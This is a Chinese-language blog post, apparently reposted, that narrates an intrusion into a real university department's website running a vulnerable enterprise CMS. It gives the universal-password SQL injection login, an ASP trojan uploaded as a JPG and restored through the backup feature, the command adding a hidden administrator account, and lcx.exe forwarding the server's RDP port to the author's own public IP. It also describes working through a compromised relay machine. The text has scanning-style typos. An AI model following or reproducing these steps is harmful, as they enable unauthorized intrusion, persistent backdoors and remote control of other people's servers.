在源码站下载了一套“易天工作室通用企业型后台管理系统”的源代码来进行研究,结果在check.asp页面中发现了一个问题:由于程序没有对输入内容进行过滤,使得我们可以输入万能密码登录,而直接进入后台(难道这个就是传说中的企业后台漏洞)。
既然发现了这套程序的漏洞,那我们当然要利用此漏洞来拿服务器了。Google hacking(也就是利用google搜索使用这套系统的网站了)了一下,来到了郑州大学某院系的页面,直接在URL后面加上admin,后台一下就跳出来了。让我们看看漏洞是否存在吧。在用户名和密码处都填‘or’=‘or’,然后把验证码写好,点登录,果然进入了管理页面,说明洞嗣真的存在。因为这套程序本身就有备份的功能,所以得到Webshell就很简单了。先把我们的ASP木马改成JPG格式上传。在空间图片管理的最后l页或2页就可以看到我们的图片木马了。
然后在图片木马上单击右键,选择属性,就可以得到上传后的文件路径了。在数据库备份里把我们的图片木马还原成ASP格式就可以了(在备份的时候,如果路径填写错误会提示网页无法显示,如果出现这样的情况,可以检查下图片的路径是否填写正确。此套程序中也有ewebeditor,如果后台中备份的功能被删除了,可以试试使用这个来拿Webshell,因为很多管理员都忘记更改它的默认密码或数据库路径)。登录我们备份出的Webshell。看了下服务器的信息,wscript.sheIL组件没有删除,而终端端口则被改成了64126。
试着连接了一下,没有成功,可能有防火墙或者是内网的原因。服务器还开了21和43958端口,看来安装有Serv一U,那就使用木马中自带的这个提权脚本来试试。执行net user cool$ love/add&net localgroup administrators cool$/add,执行后看了下“系统用户”——用户帐号”这项,果然多了个cool$用户。居然这么简单就提权成功了,好久没有遇到这样的好事了。
终端连接不上可难不倒我,上传了一个lcx.exe,在服务器上使用wscript.shell执行E:\www4root\work\mpa\admin\lcx.exe -slava 121.20.172.126 51 127.0.0.1 64126。
该命令的意思是把服务器上的64126端口转到121.20.172.l26(我自己电脑的公网IP地址)的51端口。然后再在本机执行lcx.exe-listen 51 5000,意思是把5l端口上的数据转发到5000端口,连接本机的5000端口就相当于连接服务器的64126端口了(小编注:一般是先在本地监听,然后再执行转发操作,这样可以防止数据丢失而导致数据转发失败),如果没有特殊情况就可以看到终端登录的窗口了。可是令我感到意外的是,本机接收到的数据出现了错误,提示“read fdl data error.mavbee close?”。
每次刚刚和服务器建立连接后,马上就出现数据读取错误,就是连接不上。奇怪了,以前在渗透别的网站时,服务器没有更改默认端口,使用lcx.把端口转出来就不会出错,为什幺把端口政了之后就会出现这样的错误呢?到底是因为端口更改而导致的。还是别的地方有问题呢?到百度上查了下资料,发现很多人都遇到了这样的问题,但回答却都是说是防火墙的原因,要不就说是其它一些没什么用处的信息。看来还得靠自己呀,分析了一下,这个应该不是防火墙的原因导致的,以前也遇到过有防火墙而连接不上终端的情况,但是使用lcx转一下就可以的。后来我又到论坛上去问,结果也没有找出问题究竟出在哪里!
第二天,突然想到是不是由于自己所处的网段问题,而导致连接不成功。于是便把服务器的终端端口转到到另一台Win2003的肉鸡上。当在肉鸡上连接本机的5000端口时,突然出现了这个提示。
远程计算机要求身份验证才能连接,这个提示在我的电脑一卜可没有出现过。我到百度上查了下,在一个角落发现了一篇Win2003远程桌面SSL认证配置的文章,大概内容是说因为远程桌面一直被认为比较不安全,如果加上SSL证书认证,可以提高安全性,可以通过Win2003
安装盘来安装证书服务,之后连接终端的时候就要有证书验证。
读了那篇文章后和刚才连接时出现的提示,我们可以知道引起数据读取错误的并不是因为防火墙的问题,最 有可能的就是证书认证的问题!后来进一步查了下资料,说如果安装了证书服务,要求有证书才能连接时,可以在远程桌面的安全选项中选择试图身份验证,才可以。按照这样的说法,在Win3002肉鸡远程桌面的安全选项中选择“试图身份验证”(XP系统中没有这个选项)。然后再次连接本机的5000端口,弹出了这个提示,点击“是”,如果提示不行就点查看证书,再重新添加个证书就可以了,这次终于没有了讨厌的“read fdl data error,maybe close?”错误提示了,成功连接,看了下服务器也不是在内网。
在肉鸡上连接总觉得很慢.既然现在知道了是证书认证问题引起的,那就在本机安装个证书认证服务吧。网上讲的是Win2003系统,按照网上说的我就在XP系统上一步一步的安装起来,可是按照网上说的步骤安装完之后,发现还是没有证书服务,XP系统盘里难道没有这个?想了下,如果把Win2003系统里的登录器复制到XP系统里可不可以使用呢?不管可不可以了,先试试再说,马上把肉鸡上的mstsc.exe和mstscax.dll下载到本机。因为排除了防火墙和内网的影响,所以我们直接连接服务器的64163端口,这次也出现了证书提示,理直气壮的点是,连接成功。
在入侵过程中遇到困难是难免的,重要的是要懂得如何解决遇到的问题,而不是人云亦云地胡乱猜测!希望大家在入侵检测的同时,能够学到更多的东西,有更大的进步!
本文来自 危险漫步博客 转载请注明;
本文地址:http://www.weixianmanbu.com/article/1121.html